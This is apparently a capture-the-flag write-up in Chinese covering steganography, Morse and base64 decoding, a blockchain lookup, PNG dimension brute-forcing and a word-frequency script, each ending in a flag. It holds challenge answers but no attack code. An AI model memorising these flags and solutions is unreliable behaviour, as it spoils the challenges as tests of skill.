Python_jail
疑似摩斯密码,Ctrl+H替换后解密
得到:a8e15220-7404-4269-812e-6418557b7dc2
解压后获得图片,使用zsteg看一下lsb
有个pyc文件,提取出来
zsteg -E "b1,rgb,lsb,xy" SECRET1.png > SECRET1.pyc
然后拖到网站上反编译一下获得
#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.9
# Decompiler output (see the header above). The \x.. escapes are the UTF-8
# bytes of a non-ASCII file name and message rendered one code point per
# byte -- presumably a short Chinese phrase followed by ".txt"; the tail of
# the written content is the base64 string decoded in the write-up below.
# NOTE(review): the handle is never closed, so the write is only flushed when
# the interpreter exits.
file = open('\xe7\xa6\x8f\xe6\x9d\xa5\xe9\x98\x81.txt', 'w')
file.write('\xe7\xa6\x8f\xe6\x9d\xa5\xe9\x98\x81\xe5\x9c\xa8\xe8\xbf\x99\xe9\x87\x8cZmxhZ3tiNWJjZmM4Ny01Y2E2LTQzZjEtYjM4NC01N2QwOWI4ODZjYTl9')
print('\xe7\x94\x9f\xe6\x88\x90\xe6\x88\x90\xe5\x8a\x9f\nFind it in your folder')
很明显的base64解码得到flag:
ZmxhZ3tiNWJjZmM4Ny01Y2E2LTQzZjEtYjM4NC01N2QwOWI4ODZjYTl9
flag{b5bcfc87-5ca6-43f1-b384-57d09b886ca9}
BLOCKCHAIN
Where the flag?
啥也不会,打开里边的链接:https://ropsten.etherscan.io/address/0x78f2b5695e5e6e51fc0fd6d7e0caaa05190af9cc
在最后一条成功交易内有flag
Ai
ORC
import binascii
import struct
import sys
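def find_png_dimensions(ihdr, crc_key, limit=4095):
    """Brute-force the width/height that make the IHDR CRC match.

    ihdr    : the 17 bytes "IHDR" + 13 data bytes as found in the file
              (width at offset 4, height at offset 8, big-endian).
    crc_key : the CRC32 stored in the file for that chunk.
    limit   : exclusive upper bound tried for both dimensions.
    Returns (width, height) for the first match in width-major order, or
    None when nothing in range matches.
    """
    data = bytearray(ihdr)
    for w in range(limit):
        struct.pack_into('>I', data, 4, w)
        for h in range(limit):
            struct.pack_into('>I', data, 8, h)
            if (binascii.crc32(data) & 0xffffffff) == crc_key:
                return w, h
    return None


def patch_png_dimensions(png, width, height):
    """Return a copy of *png* with the IHDR width/height fields overwritten.

    The fields live at file offsets 16 and 20 (8-byte signature, 4-byte
    length, 4-byte "IHDR" type).
    """
    out = bytearray(png)
    struct.pack_into('>II', out, 16, width, height)
    return bytes(out)


def main():
    """Prompt for an image path, recover its true size and write <path>.png."""
    path = input("图片地址:")
    with open(path, 'rb') as fh:
        png = fh.read()
    # Stored CRC at 0x1d..0x21; int.from_bytes replaces the original
    # eval('0x' + hex-string) construction, which executed text from the file.
    crc_key = int.from_bytes(png[0x1d:0x21], 'big')
    found = find_png_dimensions(png[0x0c:0x1d], crc_key)
    if found is None:
        print("no width/height below 4095 matches the stored CRC")
        sys.exit(1)
    width, height = found
    print(width, height)
    # The original called fw.close without parentheses, never closing the
    # file; the context manager guarantees the write is flushed.
    with open(path + '.png', 'wb') as fw:
        fw.write(patch_png_dimensions(png, width, height))


if __name__ == "__main__":
    main()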
用这个脚本爆破宽高,获得如下图片
然后找个OCR文字识别
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
377a bcaf开头是个7z压缩包,里边有flag
RGVzdDBnM3szNDUxMjA5OC0zMzA5LTc3MTItODg2NS03ODM0NjAyMjE2NDd9
Dest0g3{34512098-3309-7712-8865-783460221647}
The correct flag
将docx里边的东西放出来
然后进行词频分析,查找出现最多的单词,然后拼接
先查找D开头的单词,出现最多的为De,然后查找e开头,以此类推,上exp
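def count_words(text):
    """Return a Counter of the space-separated tokens in *text*.

    Empty tokens produced by runs of spaces are dropped, so that indexing a
    token's first two characters later cannot fail.
    """
    from collections import Counter
    return Counter(tok for tok in text.split(' ') if tok)


def recover_flag(counts, start='D', end='}'):
    """Follow the most frequent bigrams from *start* until *end* is reached.

    counts : mapping token -> occurrence count (e.g. from count_words)
    At each step the most frequent token whose first character is the
    current character is chosen; ties go to the earliest-inserted token,
    as in the original loop. A token needs more than one occurrence to be
    eligible, because the original counted the first occurrence as 0 and
    only accepted a strictly positive count. Returns the assembled string,
    which ends with *end*.
    Raises ValueError when no eligible token continues the chain (the
    original looped forever in that case).
    """
    flag = start
    word = start
    while word != end:
        candidates = [(tok, n) for tok, n in counts.items()
                      if n > 1 and len(tok) >= 2 and tok[0] == word]
        if not candidates:
            raise ValueError(f"no bigram continues {flag!r}")
        # max() returns the first maximal element, matching the original
        # strict '>' comparison over insertion order.
        best, _ = max(candidates, key=lambda item: item[1])
        word = best[1]
        flag += word
    return flag


def main():
    """Read content.txt, rebuild the flag from bigram frequencies, print it."""
    with open('content.txt', 'r') as f:
        counts = count_words(f.read())
    print(recover_flag(counts))


if __name__ == "__main__":
    main()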